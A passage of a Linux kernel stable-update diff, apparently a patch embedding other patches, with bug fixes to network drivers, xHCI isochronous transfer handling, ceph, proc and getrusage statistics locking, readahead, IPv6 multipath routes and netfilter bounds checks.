+ 			list_del(&mact_entry->list);
+ 			devm_kfree(sparx5->dev, mact_entry);
+-
+-			sparx5_mact_forget(sparx5, addr, mact_entry->vid);
+ 		}
+ 	}
+ 	mutex_unlock(&sparx5->mact_lock);
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+index 7af03b45555dd..497766ecdd91d 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+@@ -1243,7 +1243,7 @@ static int nfp_ct_do_tc_merge(struct nfp_fl_ct_zone_entry *zt,
+ 	/* Checks that the chain_index of the filter matches the
+ 	 * chain_index of the GOTO action.
+ 	 */
+-	if (post_ct_entry->chain_index != pre_ct_entry->chain_index)
++	if (post_ct_entry->chain_index != pre_ct_entry->goto_chain_index)
+ 		return -EINVAL;
+ 
+ 	err = nfp_ct_merge_check(pre_ct_entry, post_ct_entry);
+@@ -1776,7 +1776,8 @@ int nfp_fl_ct_handle_pre_ct(struct nfp_flower_priv *priv,
+ 	if (IS_ERR(ct_entry))
+ 		return PTR_ERR(ct_entry);
+ 	ct_entry->type = CT_TYPE_PRE_CT;
+-	ct_entry->chain_index = ct_goto->chain_index;
++	ct_entry->chain_index = flow->common.chain_index;
++	ct_entry->goto_chain_index = ct_goto->chain_index;
+ 	list_add(&ct_entry->list_node, &zt->pre_ct_list);
+ 	zt->pre_ct_count++;
+ 
+@@ -1796,9 +1797,30 @@ int nfp_fl_ct_handle_post_ct(struct nfp_flower_priv *priv,
+ {
+ 	struct flow_rule *rule = flow_cls_offload_flow_rule(flow);
+ 	struct nfp_fl_ct_flow_entry *ct_entry;
++	struct flow_action_entry *ct_goto;
+ 	struct nfp_fl_ct_zone_entry *zt;
++	struct flow_action_entry *act;
+ 	bool wildcarded = false;
+ 	struct flow_match_ct ct;
++	int i;
++
++	flow_action_for_each(i, act, &rule->action) {
++		switch (act->id) {
++		case FLOW_ACTION_REDIRECT:
++		case FLOW_ACTION_REDIRECT_INGRESS:
++		case FLOW_ACTION_MIRRED:
++		case FLOW_ACTION_MIRRED_INGRESS:
++			if (act->dev->rtnl_link_ops &&
++			    !strcmp(act->dev->rtnl_link_ops->kind, "openvswitch")) {
++				NL_SET_ERR_MSG_MOD(extack,
++						   "unsupported offload: out port is openvswitch internal port");
++				return -EOPNOTSUPP;
++			}
++			break;
++		default:
++			break;
++		}
++	}
+ 
+ 	flow_rule_match_ct(rule, &ct);
+ 	if (!ct.mask->ct_zone) {
+@@ -1823,6 +1845,8 @@ int nfp_fl_ct_handle_post_ct(struct nfp_flower_priv *priv,
+ 
+ 	ct_entry->type = CT_TYPE_POST_CT;
+ 	ct_entry->chain_index = flow->common.chain_index;
++	ct_goto = get_flow_act(flow->rule, FLOW_ACTION_GOTO);
++	ct_entry->goto_chain_index = ct_goto ? ct_goto->chain_index : 0;
+ 	list_add(&ct_entry->list_node, &zt->post_ct_list);
+ 	zt->post_ct_count++;
+ 
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.h b/drivers/net/ethernet/netronome/nfp/flower/conntrack.h
+index 762c0b36e269b..9440ab776ecea 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.h
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.h
+@@ -112,6 +112,7 @@ enum nfp_nfp_layer_name {
+  * @cookie:	Flow cookie, same as original TC flow, used as key
+  * @list_node:	Used by the list
+  * @chain_index:	Chain index of the original flow
++ * @goto_chain_index:	goto chain index of the flow
+  * @netdev:	netdev structure.
+  * @type:	Type of pre-entry from enum ct_entry_type
+  * @zt:		Reference to the zone table this belongs to
+@@ -125,6 +126,7 @@ struct nfp_fl_ct_flow_entry {
+ 	unsigned long cookie;
+ 	struct list_head list_node;
+ 	u32 chain_index;
++	u32 goto_chain_index;
+ 	enum ct_entry_type type;
+ 	struct net_device *netdev;
+ 	struct nfp_fl_ct_zone_entry *zt;
+diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c
+index f393e454f45ca..3f8da6f0b25ce 100644
+--- a/drivers/net/geneve.c
++++ b/drivers/net/geneve.c
+@@ -221,7 +221,7 @@ static void geneve_rx(struct geneve_dev *geneve, struct geneve_sock *gs,
+ 	struct genevehdr *gnvh = geneve_hdr(skb);
+ 	struct metadata_dst *tun_dst = NULL;
+ 	unsigned int len;
+-	int err = 0;
++	int nh, err = 0;
+ 	void *oiph;
+ 
+ 	if (ip_tunnel_collect_metadata() || gs->collect_md) {
+@@ -272,9 +272,23 @@ static void geneve_rx(struct geneve_dev *geneve, struct geneve_sock *gs,
+ 		skb->pkt_type = PACKET_HOST;
+ 	}
+ 
+-	oiph = skb_network_header(skb);
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_reset_network_header(skb);
+ 
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(geneve->dev, rx_length_errors);
++		DEV_STATS_INC(geneve->dev, rx_errors);
++		goto drop;
++	}
++
++	/* Get the outer header. */
++	oiph = skb->head + nh;
++
+ 	if (geneve_get_sk_family(gs) == AF_INET)
+ 		err = IP_ECN_decapsulate(oiph, skb);
+ #if IS_ENABLED(CONFIG_IPV6)
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index 4fd4563811299..366e83ed0a973 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -3137,7 +3137,8 @@ static int lan78xx_open(struct net_device *net)
+ done:
+ 	mutex_unlock(&dev->dev_mutex);
+ 
+-	usb_autopm_put_interface(dev->intf);
++	if (ret < 0)
++		usb_autopm_put_interface(dev->intf);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 1239e06dfe411..239b5edee3268 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2363,6 +2363,9 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 	/* handle completion code */
+ 	switch (trb_comp_code) {
+ 	case COMP_SUCCESS:
++		/* Don't overwrite status if TD had an error, see xHCI 4.9.1 */
++		if (td->error_mid_td)
++			break;
+ 		if (remaining) {
+ 			frame->status = short_framestatus;
+ 			if (xhci->quirks & XHCI_TRUST_TX_LENGTH)
+@@ -2378,9 +2381,13 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 	case COMP_BANDWIDTH_OVERRUN_ERROR:
+ 		frame->status = -ECOMM;
+ 		break;
+-	case COMP_ISOCH_BUFFER_OVERRUN:
+ 	case COMP_BABBLE_DETECTED_ERROR:
++		sum_trbs_for_length = true;
++		fallthrough;
++	case COMP_ISOCH_BUFFER_OVERRUN:
+ 		frame->status = -EOVERFLOW;
++		if (ep_trb != td->last_trb)
++			td->error_mid_td = true;
+ 		break;
+ 	case COMP_INCOMPATIBLE_DEVICE_ERROR:
+ 	case COMP_STALL_ERROR:
+@@ -2388,8 +2395,9 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		break;
+ 	case COMP_USB_TRANSACTION_ERROR:
+ 		frame->status = -EPROTO;
++		sum_trbs_for_length = true;
+ 		if (ep_trb != td->last_trb)
+-			return 0;
++			td->error_mid_td = true;
+ 		break;
+ 	case COMP_STOPPED:
+ 		sum_trbs_for_length = true;
+@@ -2409,6 +2417,9 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		break;
+ 	}
+ 
++	if (td->urb_length_set)
++		goto finish_td;
++
+ 	if (sum_trbs_for_length)
+ 		frame->actual_length = sum_trb_lengths(xhci, ep->ring, ep_trb) +
+ 			ep_trb_len - remaining;
+@@ -2417,6 +2428,14 @@ static int process_isoc_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 
+ 	td->urb->actual_length += frame->actual_length;
+ 
++finish_td:
++	/* Don't give back TD yet if we encountered an error mid TD */
++	if (td->error_mid_td && ep_trb != td->last_trb) {
++		xhci_dbg(xhci, "Error mid isoc TD, wait for final completion event\n");
++		td->urb_length_set = true;
++		return 0;
++	}
++
+ 	return finish_td(xhci, ep, ep_ring, td, trb_comp_code);
+ }
+ 
+@@ -2801,17 +2820,51 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 		}
+ 
+ 		if (!ep_seg) {
+-			if (!ep->skip ||
+-			    !usb_endpoint_xfer_isoc(&td->urb->ep->desc)) {
+-				/* Some host controllers give a spurious
+-				 * successful event after a short transfer.
+-				 * Ignore it.
+-				 */
+-				if ((xhci->quirks & XHCI_SPURIOUS_SUCCESS) &&
+-						ep_ring->last_td_was_short) {
+-					ep_ring->last_td_was_short = false;
+-					goto cleanup;
++
++			if (ep->skip && usb_endpoint_xfer_isoc(&td->urb->ep->desc)) {
++				skip_isoc_td(xhci, td, ep, status);
++				goto cleanup;
++			}
++
++			/*
++			 * Some hosts give a spurious success event after a short
++			 * transfer. Ignore it.
++			 */
++			if ((xhci->quirks & XHCI_SPURIOUS_SUCCESS) &&
++			    ep_ring->last_td_was_short) {
++				ep_ring->last_td_was_short = false;
++				goto cleanup;
++			}
++
++			/*
++			 * xhci 4.10.2 states isoc endpoints should continue
++			 * processing the next TD if there was an error mid TD.
++			 * So host like NEC don't generate an event for the last
++			 * isoc TRB even if the IOC flag is set.
++			 * xhci 4.9.1 states that if there are errors in mult-TRB
++			 * TDs xHC should generate an error for that TRB, and if xHC
++			 * proceeds to the next TD it should genete an event for
++			 * any TRB with IOC flag on the way. Other host follow this.
++			 * So this event might be for the next TD.
++			 */
++			if (td->error_mid_td &&
++			    !list_is_last(&td->td_list, &ep_ring->td_list)) {
++				struct xhci_td *td_next = list_next_entry(td, td_list);
++
++				ep_seg = trb_in_td(xhci, td_next->start_seg, td_next->first_trb,
++						   td_next->last_trb, ep_trb_dma, false);
++				if (ep_seg) {
++					/* give back previous TD, start handling new */
++					xhci_dbg(xhci, "Missing TD completion event after mid TD error\n");
++					ep_ring->dequeue = td->last_trb;
++					ep_ring->deq_seg = td->last_trb_seg;
++					inc_deq(xhci, ep_ring);
++					xhci_td_cleanup(xhci, td, ep_ring, td->status);
++					td = td_next;
+ 				}
++			}
++
++			if (!ep_seg) {
+ 				/* HC is busted, give up! */
+ 				xhci_err(xhci,
+ 					"ERROR Transfer event TRB DMA ptr not "
+@@ -2823,9 +2876,6 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 					  ep_trb_dma, true);
+ 				return -ESHUTDOWN;
+ 			}
+-
+-			skip_isoc_td(xhci, td, ep, status);
+-			goto cleanup;
+ 		}
+ 		if (trb_comp_code == COMP_SHORT_PACKET)
+ 			ep_ring->last_td_was_short = true;
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index 1354310cb37b1..fc25a5b09710c 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1570,6 +1570,7 @@ struct xhci_td {
+ 	struct xhci_segment	*bounce_seg;
+ 	/* actual_length of the URB has already been set */
+ 	bool			urb_length_set;
++	bool			error_mid_td;
+ 	unsigned int		num_trbs;
+ };
+ 
+diff --git a/fs/ceph/mdsmap.c b/fs/ceph/mdsmap.c
+index 3fbabc98e1f70..4a089d70ebd07 100644
+--- a/fs/ceph/mdsmap.c
++++ b/fs/ceph/mdsmap.c
+@@ -379,10 +379,11 @@ struct ceph_mdsmap *ceph_mdsmap_decode(void **p, void *end, bool msgr2)
+ 		ceph_decode_skip_8(p, end, bad_ext);
+ 		/* required_client_features */
+ 		ceph_decode_skip_set(p, end, 64, bad_ext);
++		/* bal_rank_mask */
++		ceph_decode_skip_string(p, end, bad_ext);
++	}
++	if (mdsmap_ev >= 18) {
+ 		ceph_decode_64_safe(p, end, m->m_max_xattr_size, bad_ext);
+-	} else {
+-		/* This forces the usage of the (sync) SETXATTR Op */
+-		m->m_max_xattr_size = 0;
+ 	}
+ bad_ext:
+ 	dout("mdsmap_decode m_enabled: %d, m_damaged: %d, m_num_laggy: %d\n",
+diff --git a/fs/erofs/data.c b/fs/erofs/data.c
+index b32801d716f89..9d20e5d23ae0b 100644
+--- a/fs/erofs/data.c
++++ b/fs/erofs/data.c
+@@ -440,4 +440,5 @@ const struct file_operations erofs_file_fops = {
+ 	.read_iter	= erofs_file_read_iter,
+ 	.mmap		= erofs_file_mmap,
+ 	.splice_read	= generic_file_splice_read,
++	.get_unmapped_area = thp_get_unmapped_area,
+ };
+diff --git a/fs/proc/array.c b/fs/proc/array.c
+index 1b0d78dfd20f9..d210b2f8b7ed5 100644
+--- a/fs/proc/array.c
++++ b/fs/proc/array.c
+@@ -467,13 +467,13 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 	int permitted;
+ 	struct mm_struct *mm;
+ 	unsigned long long start_time;
+-	unsigned long cmin_flt = 0, cmaj_flt = 0;
+-	unsigned long  min_flt = 0,  maj_flt = 0;
+-	u64 cutime, cstime, utime, stime;
+-	u64 cgtime, gtime;
++	unsigned long cmin_flt, cmaj_flt, min_flt, maj_flt;
++	u64 cutime, cstime, cgtime, utime, stime, gtime;
+ 	unsigned long rsslim = 0;
+ 	unsigned long flags;
+ 	int exit_code = task->exit_code;
++	struct signal_struct *sig = task->signal;
++	unsigned int seq = 1;
+ 
+ 	state = *get_task_state(task);
+ 	vsize = eip = esp = 0;
+@@ -501,12 +501,8 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 	sigemptyset(&sigign);
+ 	sigemptyset(&sigcatch);
+-	cutime = cstime = 0;
+-	cgtime = gtime = 0;
+ 
+ 	if (lock_task_sighand(task, &flags)) {
+-		struct signal_struct *sig = task->signal;
+-
+ 		if (sig->tty) {
+ 			struct pid *pgrp = tty_get_pgrp(sig->tty);
+ 			tty_pgrp = pid_nr_ns(pgrp, ns);
+@@ -517,26 +513,9 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 		num_threads = get_nr_threads(task);
+ 		collect_sigign_sigcatch(task, &sigign, &sigcatch);
+ 
+-		cmin_flt = sig->cmin_flt;
+-		cmaj_flt = sig->cmaj_flt;
+-		cutime = sig->cutime;
+-		cstime = sig->cstime;
+-		cgtime = sig->cgtime;
+ 		rsslim = READ_ONCE(sig->rlim[RLIMIT_RSS].rlim_cur);
+ 
+-		/* add up live thread stats at the group level */
+ 		if (whole) {
+-			struct task_struct *t = task;
+-			do {
+-				min_flt += t->min_flt;
+-				maj_flt += t->maj_flt;
+-				gtime += task_gtime(t);
+-			} while_each_thread(task, t);
+-
+-			min_flt += sig->min_flt;
+-			maj_flt += sig->maj_flt;
+-			gtime += sig->gtime;
+-
+ 			if (sig->flags & (SIGNAL_GROUP_EXIT | SIGNAL_STOP_STOPPED))
+ 				exit_code = sig->group_exit_code;
+ 		}
+@@ -551,6 +530,34 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 	if (permitted && (!whole || num_threads < 2))
+ 		wchan = !task_is_running(task);
+ 
++	do {
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
++		flags = read_seqbegin_or_lock_irqsave(&sig->stats_lock, &seq);
++
++		cmin_flt = sig->cmin_flt;
++		cmaj_flt = sig->cmaj_flt;
++		cutime = sig->cutime;
++		cstime = sig->cstime;
++		cgtime = sig->cgtime;
++
++		if (whole) {
++			struct task_struct *t;
++
++			min_flt = sig->min_flt;
++			maj_flt = sig->maj_flt;
++			gtime = sig->gtime;
++
++			rcu_read_lock();
++			__for_each_thread(sig, t) {
++				min_flt += t->min_flt;
++				maj_flt += t->maj_flt;
++				gtime += task_gtime(t);
++			}
++			rcu_read_unlock();
++		}
++	} while (need_seqretry(&sig->stats_lock, seq));
++	done_seqretry_irqrestore(&sig->stats_lock, seq, flags);
++
+ 	if (whole) {
+ 		thread_group_cputime_adjusted(task, &utime, &stime);
+ 	} else {
+diff --git a/include/linux/ceph/mdsmap.h b/include/linux/ceph/mdsmap.h
+index 4c3e0648dc277..fcc95bff72a57 100644
+--- a/include/linux/ceph/mdsmap.h
++++ b/include/linux/ceph/mdsmap.h
+@@ -25,7 +25,11 @@ struct ceph_mdsmap {
+ 	u32 m_session_timeout;          /* seconds */
+ 	u32 m_session_autoclose;        /* seconds */
+ 	u64 m_max_file_size;
+-	u64 m_max_xattr_size;		/* maximum size for xattrs blob */
++	/*
++	 * maximum size for xattrs blob.
++	 * Zeroed by default to force the usage of the (sync) SETXATTR Op.
++	 */
++	u64 m_max_xattr_size;
+ 	u32 m_max_mds;			/* expected up:active mds number */
+ 	u32 m_num_active_mds;		/* actual up:active mds number */
+ 	u32 possible_max_rank;		/* possible max rank index */
+diff --git a/include/linux/cpu.h b/include/linux/cpu.h
+index 008bfa68cfabc..4b06b1f1e267a 100644
+--- a/include/linux/cpu.h
++++ b/include/linux/cpu.h
+@@ -74,6 +74,8 @@ extern ssize_t cpu_show_spec_rstack_overflow(struct device *dev,
+ 					     struct device_attribute *attr, char *buf);
+ extern ssize_t cpu_show_gds(struct device *dev,
+ 			    struct device_attribute *attr, char *buf);
++extern ssize_t cpu_show_reg_file_data_sampling(struct device *dev,
++					       struct device_attribute *attr, char *buf);
+ 
+ extern __printf(4, 5)
+ struct device *cpu_device_create(struct device *parent, void *drvdata,
+diff --git a/include/trace/events/qdisc.h b/include/trace/events/qdisc.h
+index a3995925cb057..1f4258308b967 100644
+--- a/include/trace/events/qdisc.h
++++ b/include/trace/events/qdisc.h
+@@ -81,14 +81,14 @@ TRACE_EVENT(qdisc_reset,
+ 	TP_ARGS(q),
+ 
+ 	TP_STRUCT__entry(
+-		__string(	dev,		qdisc_dev(q)	)
+-		__string(	kind,		q->ops->id	)
+-		__field(	u32,		parent		)
+-		__field(	u32,		handle		)
++		__string(	dev,		qdisc_dev(q)->name	)
++		__string(	kind,		q->ops->id		)
++		__field(	u32,		parent			)
++		__field(	u32,		handle			)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__assign_str(dev, qdisc_dev(q));
++		__assign_str(dev, qdisc_dev(q)->name);
+ 		__assign_str(kind, q->ops->id);
+ 		__entry->parent = q->parent;
+ 		__entry->handle = q->handle;
+@@ -106,14 +106,14 @@ TRACE_EVENT(qdisc_destroy,
+ 	TP_ARGS(q),
+ 
+ 	TP_STRUCT__entry(
+-		__string(	dev,		qdisc_dev(q)	)
+-		__string(	kind,		q->ops->id	)
+-		__field(	u32,		parent		)
+-		__field(	u32,		handle		)
++		__string(	dev,		qdisc_dev(q)->name	)
++		__string(	kind,		q->ops->id		)
++		__field(	u32,		parent			)
++		__field(	u32,		handle			)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__assign_str(dev, qdisc_dev(q));
++		__assign_str(dev, qdisc_dev(q)->name);
+ 		__assign_str(kind, q->ops->id);
+ 		__entry->parent = q->parent;
+ 		__entry->handle = q->handle;
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index 08a8e81027289..0508937048137 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -222,7 +222,7 @@ static int cpu_map_bpf_prog_run_xdp(struct bpf_cpu_map_entry *rcpu,
+ 				    void **frames, int n,
+ 				    struct xdp_cpumap_stats *stats)
+ {
+-	struct xdp_rxq_info rxq;
++	struct xdp_rxq_info rxq = {};
+ 	struct xdp_buff xdp;
+ 	int i, nframes = 0;
+ 
+diff --git a/kernel/sys.c b/kernel/sys.c
+index c85e1abf7b7c7..d06eda1387b69 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -1778,74 +1778,87 @@ void getrusage(struct task_struct *p, int who, struct rusage *r)
+ 	struct task_struct *t;
+ 	unsigned long flags;
+ 	u64 tgutime, tgstime, utime, stime;
+-	unsigned long maxrss = 0;
++	unsigned long maxrss;
++	struct mm_struct *mm;
++	struct signal_struct *sig = p->signal;
++	unsigned int seq = 0;
+ 
+-	memset((char *)r, 0, sizeof (*r));
++retry:
++	memset(r, 0, sizeof(*r));
+ 	utime = stime = 0;
++	maxrss = 0;
+ 
+ 	if (who == RUSAGE_THREAD) {
+ 		task_cputime_adjusted(current, &utime, &stime);
+ 		accumulate_thread_rusage(p, r);
+-		maxrss = p->signal->maxrss;
+-		goto out;
++		maxrss = sig->maxrss;
++		goto out_thread;
+ 	}
+ 
+-	if (!lock_task_sighand(p, &flags))
+-		return;
++	flags = read_seqbegin_or_lock_irqsave(&sig->stats_lock, &seq);
+ 
+ 	switch (who) {
+ 	case RUSAGE_BOTH:
+ 	case RUSAGE_CHILDREN:
+-		utime = p->signal->cutime;
+-		stime = p->signal->cstime;
+-		r->ru_nvcsw = p->signal->cnvcsw;
+-		r->ru_nivcsw = p->signal->cnivcsw;
+-		r->ru_minflt = p->signal->cmin_flt;
+-		r->ru_majflt = p->signal->cmaj_flt;
+-		r->ru_inblock = p->signal->cinblock;
+-		r->ru_oublock = p->signal->coublock;
+-		maxrss = p->signal->cmaxrss;
++		utime = sig->cutime;
++		stime = sig->cstime;
++		r->ru_nvcsw = sig->cnvcsw;
++		r->ru_nivcsw = sig->cnivcsw;
++		r->ru_minflt = sig->cmin_flt;
++		r->ru_majflt = sig->cmaj_flt;
++		r->ru_inblock = sig->cinblock;
++		r->ru_oublock = sig->coublock;
++		maxrss = sig->cmaxrss;
+ 
+ 		if (who == RUSAGE_CHILDREN)
+ 			break;
+ 		fallthrough;
+ 
+ 	case RUSAGE_SELF:
+-		thread_group_cputime_adjusted(p, &tgutime, &tgstime);
+-		utime += tgutime;
+-		stime += tgstime;
+-		r->ru_nvcsw += p->signal->nvcsw;
+-		r->ru_nivcsw += p->signal->nivcsw;
+-		r->ru_minflt += p->signal->min_flt;
+-		r->ru_majflt += p->signal->maj_flt;
+-		r->ru_inblock += p->signal->inblock;
+-		r->ru_oublock += p->signal->oublock;
+-		if (maxrss < p->signal->maxrss)
+-			maxrss = p->signal->maxrss;
+-		t = p;
+-		do {
++		r->ru_nvcsw += sig->nvcsw;
++		r->ru_nivcsw += sig->nivcsw;
++		r->ru_minflt += sig->min_flt;
++		r->ru_majflt += sig->maj_flt;
++		r->ru_inblock += sig->inblock;
++		r->ru_oublock += sig->oublock;
++		if (maxrss < sig->maxrss)
++			maxrss = sig->maxrss;
++
++		rcu_read_lock();
++		__for_each_thread(sig, t)
+ 			accumulate_thread_rusage(t, r);
+-		} while_each_thread(p, t);
++		rcu_read_unlock();
++
+ 		break;
+ 
+ 	default:
+ 		BUG();
+ 	}
+-	unlock_task_sighand(p, &flags);
+ 
+-out:
+-	r->ru_utime = ns_to_kernel_old_timeval(utime);
+-	r->ru_stime = ns_to_kernel_old_timeval(stime);
++	if (need_seqretry(&sig->stats_lock, seq)) {
++		seq = 1;
++		goto retry;
++	}
++	done_seqretry_irqrestore(&sig->stats_lock, seq, flags);
+ 
+-	if (who != RUSAGE_CHILDREN) {
+-		struct mm_struct *mm = get_task_mm(p);
++	if (who == RUSAGE_CHILDREN)
++		goto out_children;
+ 
+-		if (mm) {
+-			setmax_mm_hiwater_rss(&maxrss, mm);
+-			mmput(mm);
+-		}
++	thread_group_cputime_adjusted(p, &tgutime, &tgstime);
++	utime += tgutime;
++	stime += tgstime;
++
++out_thread:
++	mm = get_task_mm(p);
++	if (mm) {
++		setmax_mm_hiwater_rss(&maxrss, mm);
++		mmput(mm);
+ 	}
++
++out_children:
+ 	r->ru_maxrss = maxrss * (PAGE_SIZE / 1024); /* convert pages to KBs */
++	r->ru_utime = ns_to_kernel_old_timeval(utime);
++	r->ru_stime = ns_to_kernel_old_timeval(stime);
+ }
+ 
+ SYSCALL_DEFINE2(getrusage, int, who, struct rusage __user *, ru)
+diff --git a/mm/readahead.c b/mm/readahead.c
+index ba43428043a35..e4b772bb70e68 100644
+--- a/mm/readahead.c
++++ b/mm/readahead.c
+@@ -483,7 +483,7 @@ static inline int ra_alloc_folio(struct readahead_control *ractl, pgoff_t index,
+ 
+ 	if (!folio)
+ 		return -ENOMEM;
+-	mark = round_up(mark, 1UL << order);
++	mark = round_down(mark, 1UL << order);
+ 	if (index == mark)
+ 		folio_set_readahead(folio);
+ 	err = filemap_add_folio(ractl->mapping, folio, index, gfp);
+@@ -591,7 +591,7 @@ static void ondemand_readahead(struct readahead_control *ractl,
+ 	 * It's the expected callback index, assume sequential access.
+ 	 * Ramp up sizes, and push forward the readahead window.
+ 	 */
+-	expected = round_up(ra->start + ra->size - ra->async_size,
++	expected = round_down(ra->start + ra->size - ra->async_size,
+ 			1UL << order);
+ 	if (index == expected || index == (ra->start + ra->size)) {
+ 		ra->start += ra->size;
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 7f65dc750feb8..887599d351b8d 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5335,19 +5335,7 @@ static int ip6_route_multipath_add(struct fib6_config *cfg,
+ 	err_nh = NULL;
+ 	list_for_each_entry(nh, &rt6_nh_list, next) {
+ 		err = __ip6_ins_rt(nh->fib6_info, info, extack);
+-		fib6_info_release(nh->fib6_info);
+-
+-		if (!err) {
+-			/* save reference to last route successfully inserted */
+-			rt_last = nh->fib6_info;
+-
+-			/* save reference to first route for notification */
+-			if (!rt_notif)
+-				rt_notif = nh->fib6_info;
+-		}
+ 
+-		/* nh->fib6_info is used or freed at this point, reset to NULL*/
+-		nh->fib6_info = NULL;
+ 		if (err) {
+ 			if (replace && nhn)
+ 				NL_SET_ERR_MSG_MOD(extack,
+@@ -5355,6 +5343,12 @@ static int ip6_route_multipath_add(struct fib6_config *cfg,
+ 			err_nh = nh;
+ 			goto add_errout;
+ 		}
++		/* save reference to last route successfully inserted */
++		rt_last = nh->fib6_info;
++
++		/* save reference to first route for notification */
++		if (!rt_notif)
++			rt_notif = nh->fib6_info;
+ 
+ 		/* Because each route is added like a single route we remove
+ 		 * these flags after the first nexthop: if there is a collision,
+@@ -5415,8 +5409,7 @@ static int ip6_route_multipath_add(struct fib6_config *cfg,
+ 
+ cleanup:
+ 	list_for_each_entry_safe(nh, nh_safe, &rt6_nh_list, next) {
+-		if (nh->fib6_info)
+-			fib6_info_release(nh->fib6_info);
++		fib6_info_release(nh->fib6_info);
+ 		list_del(&nh->next);
+ 		kfree(nh);
+ 	}
+diff --git a/net/netfilter/nf_conntrack_h323_asn1.c b/net/netfilter/nf_conntrack_h323_asn1.c
+index e697a824b0018..540d97715bd23 100644
+--- a/net/netfilter/nf_conntrack_h323_asn1.c
++++ b/net/netfilter/nf_conntrack_h323_asn1.c
+@@ -533,6 +533,8 @@ static int decode_seq(struct bitstr *bs, const struct field_t *f,
+ 	/* Get fields bitmap */
+ 	if (nf_h323_error_boundary(bs, 0, f->sz))
+ 		return H323_ERROR_BOUND;
++	if (f->sz > 32)
++		return H323_ERROR_RANGE;
+ 	bmp = get_bitmap(bs, f->sz);
+ 	if (base)
+ 		*(unsigned int *)base = bmp;
+@@ -589,6 +591,8 @@ static int decode_seq(struct bitstr *bs, const struct field_t *f,
+ 	bmp2_len = get_bits(bs, 7) + 1;
+ 	if (nf_h323_error_boundary(bs, 0, bmp2_len))
+ 		return H323_ERROR_BOUND;
++	if (bmp2_len > 32)
++		return H323_ERROR_RANGE;
+ 	bmp2 = get_bitmap(bs, bmp2_len);
+ 	bmp |= bmp2 >> f->sz;
+ 	if (base)
+diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
+index 8df7564f0611e..2bfe3cdfbd581 100644
+--- a/net/netfilter/nft_ct.c
++++ b/net/netfilter/nft_ct.c
+@@ -1237,14 +1237,13 @@ static int nft_ct_expect_obj_init(const struct nft_ctx *ctx,
+ 	switch (priv->l3num) {
+ 	case NFPROTO_IPV4:
+ 	case NFPROTO_IPV6:
+-		if (priv->l3num != ctx->family)
+-			return -EINVAL;
++		if (priv->l3num == ctx->family || ctx->family == NFPROTO_INET)
++			break;
+ 
+-		fallthrough;
+-	case NFPROTO_INET:
+-		break;
++		return -EINVAL;
++	case NFPROTO_INET: /* tuple.src.l3num supports NFPROTO_IPV4/6 only */
+ 	default:
+-		return -EOPNOTSUPP;
++		return -EAFNOSUPPORT;
+ 	}
+ 
+ 	priv->l4proto = nla_get_u8(tb[NFTA_CT_EXPECT_L4PROTO]);
+diff --git a/net/netrom/af_netrom.c b/net/netrom/af_netrom.c
+index ec5747969f964..f0879295de110 100644
+--- a/net/netrom/af_netrom.c
++++ b/net/netrom/af_netrom.c
+@@ -453,16 +453,16 @@ static int nr_create(struct net *net, struct socket *sock, int protocol,
+ 	nr_init_timers(sk);
+ 
+ 	nr->t1     =
+-		msecs_to_jiffies(sysctl_netrom_transport_timeout);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_timeout));
+ 	nr->t2     =
+-		msecs_to_jiffies(sysctl_netrom_transport_acknowledge_delay);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_acknowledge_delay));
+ 	nr->n2     =
+-		msecs_to_jiffies(sysctl_netrom_transport_maximum_tries);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_maximum_tries));
+ 	nr->t4     =
+-		msecs_to_jiffies(sysctl_netrom_transport_busy_delay);
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_busy_delay));
+ 	nr->idle   =
+-		msecs_to_jiffies(sysctl_netrom_transport_no_activity_timeout);
+-	nr->window = sysctl_netrom_transport_requested_window_size;
++		msecs_to_jiffies(READ_ONCE(sysctl_netrom_transport_no_activity_timeout));
